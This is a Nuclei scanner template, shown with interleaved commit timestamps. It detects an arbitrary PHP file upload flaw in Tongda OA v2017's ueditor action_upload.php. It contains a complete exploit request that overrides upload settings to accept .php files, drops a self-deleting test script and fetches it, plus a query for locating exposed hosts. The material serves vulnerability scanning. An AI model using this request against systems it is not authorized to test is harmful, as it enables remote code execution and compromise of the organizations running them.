nuclei-templates/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml

71 lines
2.5 KiB
YAML
Raw Normal View History

2023-09-14 19:11:38 +00:00
id: tongda-action-uploadfile
2023-08-18 03:22:06 +00:00
info:
2023-09-14 19:11:38 +00:00
name: Tongda OA v2017 action_upload - Arbitrary File Upload
2023-08-18 03:22:06 +00:00
author: SleepingBag945
severity: critical
2023-09-06 19:45:50 +00:00
description: |
Tongda OA v2017 action_upload.php file filtering is insufficient and does not require background permissions, resulting in arbitrary file upload vulnerabilities
2023-08-18 03:22:06 +00:00
reference:
2023-09-06 19:45:50 +00:00
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2017%20action_upload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
- https://github.com/shadow1ng/fscan/blob/main/WebScan/pocs/tongda-v2017-uploadfile.yml
2024-09-10 09:08:16 +00:00
classification:
cpe: cpe:2.3:a:tongda2000:office_anywhere_2017:*:*:*:*:*:*:*:*
2023-09-06 19:45:50 +00:00
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 2
2024-09-10 08:22:50 +00:00
vendor: tongda2000
2024-09-10 09:08:16 +00:00
product: office_anywhere_2017
fofa-query: app="TDXK-通达OA"
2023-09-17 16:11:07 +00:00
tags: tongda,fileupload,intrusive,router
2023-09-14 19:11:38 +00:00
variables:
2024-04-15 11:26:37 +00:00
string: "tongda-action-uploadfile"
2023-08-18 03:22:06 +00:00
http:
- raw:
- |
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjhddzlqp
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[fileFieldName]"
ffff
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"
1000000000
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[filePathFormat]"
2023-09-06 19:45:50 +00:00
{{randstr}}
2023-08-18 03:22:06 +00:00
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"
.php
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream
2024-04-15 11:26:37 +00:00
<?php echo md5("{{string}}");unlink(__FILE__);?>
2023-08-18 03:22:06 +00:00
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="mufile"
submit
------WebKitFormBoundaryjhddzlqp--
- |
2023-09-06 19:45:50 +00:00
GET {{randstr}}.php HTTP/1.1
2023-08-18 03:22:06 +00:00
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
2023-09-17 16:11:07 +00:00
part: body_2
2023-08-18 03:22:06 +00:00
words:
2024-04-15 11:26:37 +00:00
- '{{md5(string)}}'
2023-09-06 19:45:50 +00:00
2023-08-18 03:22:06 +00:00
- type: status
status:
2023-10-14 11:27:55 +00:00
- 200
2024-09-12 05:14:01 +00:00
# digest: 4a0a00473045022071fe9fabdbc8d1c16889a2f4a0b86748a9fde84f3d05da3c5b9236b12e4e9a92022100ff3f9b41d6ae10046f6a20d020c9c544bce7206084911692cfbe47cbeb8e0151:922c64590222798bb761d5b6d8e72950